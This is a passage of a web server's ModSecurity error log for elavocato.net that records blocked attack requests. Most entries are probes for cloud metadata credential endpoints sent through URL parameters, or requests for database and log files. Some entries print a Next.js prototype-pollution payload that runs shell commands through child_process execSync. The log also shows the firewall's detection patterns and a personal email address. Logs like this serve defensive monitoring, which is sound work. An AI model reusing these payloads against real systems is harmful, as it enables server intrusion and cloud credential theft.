"OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/database.sql"] [unique_id "adGQldqfS3NFySZg695_vQAAAQI"], referer: https://t.co/ [Sun Apr 05 00:28:37.401199 2026] [:error] [pid 21759:tid 21772] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:redirect: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qcwAAAUo"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:37.411130 2026] [:error] [pid 21759:tid 21782] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:out. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:out: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qdQAAAVQ"], referer: https://www.bing.com/ [Sun Apr 05 00:28:37.423652 2026] [:error] [pid 21759:tid 21776] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:out. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:out: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qdgAAAU4"], referer: https://t.co/ [Sun Apr 05 00:28:37.472211 2026] [:error] [pid 20578:tid 20604] [client 212.86.126.157:37798] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/error.log"] [unique_id "adGQlTh7EGfB2lyFYwlcLAAAANg"], referer: http://elavocato.net/error.log [Sun Apr 05 00:28:37.825845 2026] [:error] [pid 21759:tid 21763] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:out. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:out: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qgAAAAUE"], referer: https://t.co/ [Sun Apr 05 00:28:37.836623 2026] [:error] [pid 21759:tid 21779] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:out. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:out: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qgQAAAVE"], referer: http://elavocato.net/?out=http://100.100.100.200/latest/meta-data/ [Sun Apr 05 00:28:37.846684 2026] [:error] [pid 21759:tid 21766] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:callback. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:callback: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qggAAAUQ"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:37.857855 2026] [:error] [pid 21759:tid 21774] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:callback. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:callback: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlRw49xiYi6Ae5e2qgwAAAUw"], referer: https://www.google.com/ [Sun Apr 05 00:28:38.352040 2026] [:error] [pid 21759:tid 21777] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:callback. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:callback: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qjgAAAU8"], referer: http://elavocato.net/?callback=http://169.254.169.254/metadata/instance?api-version=2021-02-01 [Sun Apr 05 00:28:38.362339 2026] [:error] [pid 21759:tid 21786] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:callback. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:callback: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qjwAAAVg"], referer: https://www.bing.com/ [Sun Apr 05 00:28:38.372186 2026] [:error] [pid 21759:tid 21784] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:request. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:request: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qkAAAAVY"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:38.384539 2026] [:error] [pid 21759:tid 21780] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:request. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:request: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qkgAAAVI"], referer: https://www.google.com/ [Sun Apr 05 00:28:38.805947 2026] [:error] [pid 21759:tid 21785] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:request. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:request: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qmgAAAVc"], referer: https://www.bing.com/ [Sun Apr 05 00:28:38.814654 2026] [:error] [pid 21759:tid 21762] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:request. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:request: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qmwAAAUA"], referer: http://elavocato.net/?request=http://100.100.100.200/latest/meta-data/ [Sun Apr 05 00:28:38.824783 2026] [:error] [pid 21759:tid 21765] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:load. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:load: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qnQAAAUM"], referer: https://www.bing.com/ [Sun Apr 05 00:28:38.834708 2026] [:error] [pid 21759:tid 21772] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:load. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:load: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlhw49xiYi6Ae5e2qngAAAUo"], referer: https://t.co/ [Sun Apr 05 00:28:39.176429 2026] [:error] [pid 21759:tid 21784] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:load. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:load: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlxw49xiYi6Ae5e2qpQAAAVY"], referer: http://elavocato.net/?load=http://169.254.169.254/metadata/instance?api-version=2021-02-01 [Sun Apr 05 00:28:39.193473 2026] [:error] [pid 21759:tid 21780] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:load. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:load: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlxw49xiYi6Ae5e2qpgAAAVI"], referer: http://elavocato.net/?load=http://100.100.100.200/latest/meta-data/ [Sun Apr 05 00:28:39.203708 2026] [:error] [pid 21759:tid 21773] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:fetch. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:fetch: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlxw49xiYi6Ae5e2qpwAAAUs"], referer: http://elavocato.net/?fetch=http://169.254.169.254/latest/meta-data/ [Sun Apr 05 00:28:39.214065 2026] [:error] [pid 21759:tid 21768] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:fetch. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:fetch: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlxw49xiYi6Ae5e2qqAAAAUY"], referer: http://elavocato.net/?fetch=http://169.254.169.254/latest/meta-data/iam/security-credentials/ [Sun Apr 05 00:28:39.553062 2026] [:error] [pid 21759:tid 21766] [client 212.86.126.157:37936] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:fetch. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:fetch: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlxw49xiYi6Ae5e2qsQAAAUQ"], referer: https://www.google.com/ [Sun Apr 05 00:28:39.564122 2026] [:error] [pid 21759:tid 21772] [client 212.86.126.157:37936] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:fetch. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:fetch: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlxw49xiYi6Ae5e2qswAAAUo"], referer: https://t.co/ [Sun Apr 05 02:34:11.778046 2026] [:error] [pid 19536:tid 19655] [client 85.208.96.209:26472] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adGuA8ncWDlTsNFoHHBZvwAAAFc"] [Sun Apr 05 03:49:00.168481 2026] [:error] [pid 1503:tid 1526] [client 43.130.3.120:48886] [client 43.130.3.120] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "adG_jEI7AjfUQYCN-J7-jQAAANE"] [Sun Apr 05 04:03:39.130166 2026] [autoindex:error] [pid 13019:tid 13261] [client 149.88.101.8:20804] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Apr 05 12:11:58.203788 2026] [:error] [pid 23077:tid 23085] [client 54.169.215.224:43244] [client 54.169.215.224] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "elavocato.net"] [uri "/ar"] [unique_id "adI1bpc83uMXRUE9zvTEUgAAAcI"] [Sun Apr 05 12:11:58.358813 2026] [:error] [pid 23077:tid 23089] [client 54.169.215.224:43244] [client 54.169.215.224] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "elavocato.net"] [uri "/ar"] [unique_id "adI1bpc83uMXRUE9zvTEVgAAAcY"] [Sun Apr 05 12:11:58.519830 2026] [:error] [pid 23077:tid 23084] [client 54.169.215.224:43244] [client 54.169.215.224] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "elavocato.net"] [uri "/ar"] [unique_id "adI1bpc83uMXRUE9zvTEWgAAAcE"] [Mon Apr 06 00:51:20.462451 2026] [:error] [pid 1308:tid 1353] [client 170.106.110.146:51870] [client 170.106.110.146] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ 